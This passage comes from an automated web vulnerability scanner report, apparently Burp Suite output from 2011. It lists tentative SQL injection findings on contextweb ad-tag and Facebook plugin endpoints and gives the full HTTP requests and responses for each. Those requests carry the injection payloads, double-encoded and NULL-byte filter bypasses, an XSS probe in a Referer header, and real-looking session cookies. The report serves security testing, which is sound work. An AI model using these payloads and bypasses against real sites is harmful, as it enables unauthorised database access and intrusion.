P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB27
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 1412
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Tue, 10 May 2011 14:09:40 GMT
Connection: close
Set-Cookie: V=wOebwAz4UvVv; domain=.contextweb.com; expires=Thu, 10-May-2012 14:09:40 GMT; path=/
Set-Cookie: 530930_4_90495=1305036580989; domain=.contextweb.com; path=/
Set-Cookie: vf=5; domain=.contextweb.com; expires=Wed, 11-May-2011 04:00:00 GMT; path=/

var strCreative=''
+ '<IFRAME HEIGHT="90" WIDTH="728" SRC="http://media.contextweb.com/creatives/BackupTags/530930/82ee614d-b189-4b28-8d83-df850b76e9fbAdKarma_728x90..html" VISIBLE="true" MARGINWIDTH
...[SNIP]...

1.20. http://tag.contextweb.com/TagPublish/getad.aspx [tz parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tag.contextweb.com
Path:   /TagPublish/getad.aspx

Issue detail

The tz parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the tz parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the tz request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /TagPublish/getad.aspx?tagver=1&ca=VIEWAD&cp=530930&ct=90494&cf=300X250&cn=1&rq=1&dw=865&cwu=http%3A%2F%2Fwww.gather.com%2F6360d%253Cimg%2Bsrc%3Da%2Bonerror%3Dalert%281%29%253E1b6979d15ce&mrnd=42339118&if=0&tl=1&pxy=670,265&cxy=865,527&dxy=865,527&tz=300%2527&ln=en-US HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/6360d%3Cimg+src=a+onerror=alert(1)%3E1b6979d15ce
Cookie: C2W4=3D-75AN8VZnYq06_wZQiWy50NyrW9adj8DvHdR7ctR5Ho-CybrZh3NQ; V=RiC6i2pCL3Ub; FC1-WC=^54012_1_2R5ws; FC1-WCR=^108044_1_2R5ws; CDSActionTracking6=gDLdEnJ4dUI3|RiC6i2pCL3Ub|503597|2587|5273|54012|108044|94417|3|0|0|maysville-online.com|2|8|1|0|2|1|2||1|0|PEiOeaHGRLH4quYZj5mgESimscR103Gq|I|2QJ2U|31Blm; pb_rtb_ev=1:535039.5202f94d-e42f-420e-8fc6-233eeae015a9.0|531399.1xcfgwn0ixqhg.0; cw=cw

Response 1

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: CW-APP202
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 1183
Date: Tue, 10 May 2011 14:11:07 GMT
Connection: close

var strCreative=''
+ '<img src=http://media.contextweb.com/creatives/defaults/300x250.gif height=250 border=0 width=300 alt="There is an error in the ad tag code."><!--ERROR_TAG(id=cw-app202_suBTQLG9
...[SNIP]...

Request 2

GET /TagPublish/getad.aspx?tagver=1&ca=VIEWAD&cp=530930&ct=90494&cf=300X250&cn=1&rq=1&dw=865&cwu=http%3A%2F%2Fwww.gather.com%2F6360d%253Cimg%2Bsrc%3Da%2Bonerror%3Dalert%281%29%253E1b6979d15ce&mrnd=42339118&if=0&tl=1&pxy=670,265&cxy=865,527&dxy=865,527&tz=300%2527%2527&ln=en-US HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/6360d%3Cimg+src=a+onerror=alert(1)%3E1b6979d15ce
Cookie: C2W4=3D-75AN8VZnYq06_wZQiWy50NyrW9adj8DvHdR7ctR5Ho-CybrZh3NQ; V=RiC6i2pCL3Ub; FC1-WC=^54012_1_2R5ws; FC1-WCR=^108044_1_2R5ws; CDSActionTracking6=gDLdEnJ4dUI3|RiC6i2pCL3Ub|503597|2587|5273|54012|108044|94417|3|0|0|maysville-online.com|2|8|1|0|2|1|2||1|0|PEiOeaHGRLH4quYZj5mgESimscR103Gq|I|2QJ2U|31Blm; pb_rtb_ev=1:535039.5202f94d-e42f-420e-8fc6-233eeae015a9.0|531399.1xcfgwn0ixqhg.0; cw=cw

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB26
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 2546
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Tue, 10 May 2011 14:11:07 GMT
Connection: close
Set-Cookie: V=RiC6i2pCL3Ub; domain=.contextweb.com; expires=Thu, 10-May-2012 14:11:07 GMT; path=/
Set-Cookie: 530930_3_90494=1305036667417; domain=.contextweb.com; path=/
Set-Cookie: vf=1; domain=.contextweb.com; expires=Wed, 11-May-2011 04:00:00 GMT; path=/

var strCreative=''
+ '<script language="JavaScript">\n'
+ 'var zflag_nid="1432"; var zflag_cid="1"; var zflag_sid="1"; var zflag_width="300"; var zflag_height="250"; var zflag_sz="9";\n'
+ '</scr
...[SNIP]...

1.21. http://tag.contextweb.com/TagPublish/getjs.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /TagPublish%00'/getjs.aspx?01AD=3D-75AN8VZnYq06_wZQiWy50NyrW9adj8DvHdR7ctR5Ho-CybrZh3NQ&01RI=9A58E40C8074BA9&01NA=&action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=530930&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=90494 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/6360d%3Cimg+src=a+onerror=alert(1)%3E1b6979d15ce
Cookie: C2W4=CT-1; V=RiC6i2pCL3Ub; FC1-WC=^54012_1_2R5ws; FC1-WCR=^108044_1_2R5ws; CDSActionTracking6=gDLdEnJ4dUI3|RiC6i2pCL3Ub|503597|2587|5273|54012|108044|94417|3|0|0|maysville-online.com|2|8|1|0|2|1|2||1|0|PEiOeaHGRLH4quYZj5mgESimscR103Gq|I|2QJ2U|31Blm; pb_rtb_ev=1:535039.5202f94d-e42f-420e-8fc6-233eeae015a9.0|531399.1xcfgwn0ixqhg.0

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
nnCoection: close
Content-Length: 34
Vary: Accept-Encoding
Date: Tue, 10 May 2011 14:10:31 GMT
Connection: close
Set-Cookie: C2W4=3D-75AN8VZnYq06_wZQiWy50NyrW9adj8DvHdR7ctR5Ho-CybrZh3NQ; expires=Tue, 07-Jun-2011 14:10:31 GMT; path=/; domain=.contextweb.com
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /TagPublish%00''/getjs.aspx?01AD=3D-75AN8VZnYq06_wZQiWy50NyrW9adj8DvHdR7ctR5Ho-CybrZh3NQ&01RI=9A58E40C8074BA9&01NA=&action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=530930&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=90494 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/6360d%3Cimg+src=a+onerror=alert(1)%3E1b6979d15ce
Cookie: C2W4=CT-1; V=RiC6i2pCL3Ub; FC1-WC=^54012_1_2R5ws; FC1-WCR=^108044_1_2R5ws; CDSActionTracking6=gDLdEnJ4dUI3|RiC6i2pCL3Ub|503597|2587|5273|54012|108044|94417|3|0|0|maysville-online.com|2|8|1|0|2|1|2||1|0|PEiOeaHGRLH4quYZj5mgESimscR103Gq|I|2QJ2U|31Blm; pb_rtb_ev=1:535039.5202f94d-e42f-420e-8fc6-233eeae015a9.0|531399.1xcfgwn0ixqhg.0

Response 2

HTTP/1.1 400 Bad Request
X-Powered-By: Servlet/3.0
Content-Length: 0
Cneonction: close
Date: Tue, 10 May 2011 14:10:31 GMT
Connection: close
Set-Cookie: C2W4=3D-75AN8VZnYq06_wZQiWy50NyrW9adj8DvHdR7ctR5Ho-CybrZh3NQ; expires=Tue, 07-Jun-2011 14:10:31 GMT; path=/; domain=.contextweb.com
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"


1.22. http://www.facebook.com/plugins/facepile.php [datr cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.facebook.com
Path:   /plugins/facepile.php

Issue detail

The datr cookie appears to be vulnerable to SQL injection attacks. The payloads 14514548'%20or%201%3d1--%20 and 14514548'%20or%201%3d2--%20 were each submitted in the datr cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /plugins/facepile.php?action=like&api_key=4d965afccc4d86c598dbf5d94fb34a7c&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3ad7f444%26origin%3Dhttp%253A%252F%252Fwww.huffingtonpost.com%252Ff1a56ca204%26relation%3Dparent.parent%26transport%3Dpostmessage&locale=en_US&max_rows=2&sdk=joey&width=264 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/07/rick-santorum-south-carolina-straw-poll_n_859012.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo214514548'%20or%201%3d1--%20; lsd=M8vgg

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.82.40
X-Cnection: close
Date: Tue, 10 May 2011 13:36:49 GMT
Content-Length: 6665

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yj/r/QyZCsJKRLP8.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
<script type="text/javascript">window.Bootloader && Bootloader.done(["lIKWr"]);</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
<body class="transparent_widget facepile UIPage_LoggedOut safari4 Locale_en_US">
<div class="connect_widget"><div class="clearfix profile_images_with_margin"></div></div><script type="text/javascript">
Env={user:0,locale:"en_US",method:"GET",start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:375981,vip:"69.171.224.39",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",rep_lag:2,fb_dtsg:"-rYxz",lhsh:"71b9b",tracking_domain:"http:\/\/pixel.facebook.com",retry_ajax_on_network_error:"1",ajaxpipe_enabled:"1",no_cookies:1};
</script>
<script type="text/javascript">Bootloader.setResourceMap({"kM3FS":{"type":"css","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yX\/r\/AZ23fTP8PUp.css"},"\/lUyM":{"type":"css","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yj\/r\/QyZCsJKRLP8.css"},"ff6N5":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yD\/r\/rZiaNe7iEDZ.css"},"\/YYg5":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/y8\/r\/w8K2nfDzJmR.css"}});Bootloader.setResourceMap({"Zz9gy":{"type":"js","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yE\/r\/AKaGrClUAcV.js"},"JRfiS":{"type":"js","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yL\/r\/KI-TuOEwsYB.js"},"iJB9Y":{"type":"js","sr
...[SNIP]...

Request 2

GET /plugins/facepile.php?action=like&api_key=4d965afccc4d86c598dbf5d94fb34a7c&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3ad7f444%26origin%3Dhttp%253A%252F%252Fwww.huffingtonpost.com%252Ff1a56ca204%26relation%3Dparent.parent%26transport%3Dpostmessage&locale=en_US&max_rows=2&sdk=joey&width=264 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/07/rick-santorum-south-carolina-straw-poll_n_859012.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo214514548'%20or%201%3d2--%20; lsd=M8vgg

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.124.46
X-Cnection: close
Date: Tue, 10 May 2011 13:36:50 GMT
Content-Length: 6691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/YT_08LAa7Q_.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yj/r/QyZCsJKRLP8.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yO/r/sBdNI8BQygP.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
<script type="text/javascript">window.Bootloader && Bootloader.done(["lIKWr"]);</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
<body class="transparent_widget facepile UIPage_LoggedOut safari4 Locale_en_US">
<div class="connect_widget"><div class="clearfix profile_images_with_margin"></div></div><script type="text/javascript">
Env={user:0,locale:"en_US",method:"GET",start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:375981,vip:"69.171.224.39",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",rep_lag:2,fb_dtsg:"-rYxz",lhsh:"8a049",tracking_domain:"http:\/\/pixel.facebook.com",retry_ajax_on_network_error:"1",ajaxpipe_enabled:"1",no_cookies:1};
</script>
<script type="text/javascript">Bootloader.setResourceMap({"kM3FS":{"type":"css","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yl\/r\/YT_08LAa7Q_.css"},"\/lUyM":{"type":"css","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yj\/r\/QyZCsJKRLP8.css"},"ff6N5":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yO\/r\/sBdNI8BQygP.css"},"\/YYg5":{"type":"css","permanent":1,"src":"http:\/\/b.static.ak.fbcdn.net\/rsrc.php\/v1\/yC\/r\/CATT0k7_6Qj.css"}});Bootloader.setResourceMap({"Zz9gy":{"type":"js","src":"http:\/\/b.static.ak.fbcdn.net\/rsrc.php\/v1\/yE\/r\/AKaGrClUAcV.js"},"JRfiS":{"type":"js","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yL\/r\/KI-TuOEwsYB.js"},"iJB9Y":{"type":
...[SNIP]...

1.23. http://www.facebook.com/plugins/likebox.php [datr cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The datr cookie appears to be vulnerable to SQL injection attacks. The payloads 20789087'%20or%201%3d1--%20 and 20789087'%20or%201%3d2--%20 were each submitted in the datr cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /plugins/likebox.php?href=http://www.facebook.com/pages/New-York-NY/mocoNews/87122473238&width=192&height=60&colorscheme=light&connections=0&stream=false&header=true HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://moconews.net/article/419-nfc-in-focus-at-google-io-as-foursquare-hashable-join-party/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo220789087'%20or%201%3d1--%20; lsd=M8vgg

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.99.27
X-Cnection: close
Date: Tue, 10 May 2011 13:40:50 GMT
Content-Length: 9211

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
<script type="text/javascript">window.Bootloader && Bootloader.done(["lIKWr"]);</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
<body class="auto_resize_iframe fan_widget connect_widget UIPage_LoggedOut safari4 Locale_en_US">
<div class="app_content_87122473238"><div class="fan_box"><div class=""><div class="connect_top clearfix"><a href="http://www.facebook.com/mocoNews" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41599_87122473238_6589482_q.jpg" alt="mocoNews" /></a><div class="connect_action"><div class="name_block"><a href="http://www.facebook.com/mocoNews" target="_blank"><span class="name">mocoNews</span></a></div><div><div id="connect_widget_4dc94062ce4eb1d48734681" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">Y
...[SNIP]...

Request 2

GET /plugins/likebox.php?href=http://www.facebook.com/pages/New-York-NY/mocoNews/87122473238&width=192&height=60&colorscheme=light&connections=0&stream=false&header=true HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://moconews.net/article/419-nfc-in-focus-at-google-io-as-foursquare-hashable-join-party/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo220789087'%20or%201%3d2--%20; lsd=M8vgg

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.88.32
X-Cnection: close
Date: Tue, 10 May 2011 13:40:52 GMT
Content-Length: 9237

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/YT_08LAa7Q_.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yO/r/sBdNI8BQygP.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
<script type="text/javascript">window.Bootloader && Bootloader.done(["lIKWr"]);</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
<body class="auto_resize_iframe fan_widget connect_widget UIPage_LoggedOut safari4 Locale_en_US">
<div class="app_content_87122473238"><div class="fan_box"><div class=""><div class="connect_top clearfix"><a href="http://www.facebook.com/mocoNews" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41599_87122473238_6589482_q.jpg" alt="mocoNews" /></a><div class="connect_action"><div class="name_block"><a href="http://www.facebook.com/mocoNews" target="_blank"><span class="name">mocoNews</span></a></div><div><div id="connect_widget_4dc940640b0e43397323225" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_ele
...[SNIP]...

1.24. http://www.facebook.com/plugins/recommendations.php [datr cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.facebook.com
Path:   /plugins/recommendations.php

Issue detail

The datr cookie appears to be vulnerable to SQL injection attacks. The payloads 19807859'%20or%201%3d1--%20 and 19807859'%20or%201%3d2--%20 were each submitted in the datr cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /plugins/recommendations.php?border_color=%23ffffff&header=true&height=300&locale=en_US&sdk=joey&site=http%3A%2F%2Fwww.slashgear.com&width=315 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://cdn.slashgear.com/fbrecom.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo219807859'%20or%201%3d1--%20; lsd=M8vgg

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
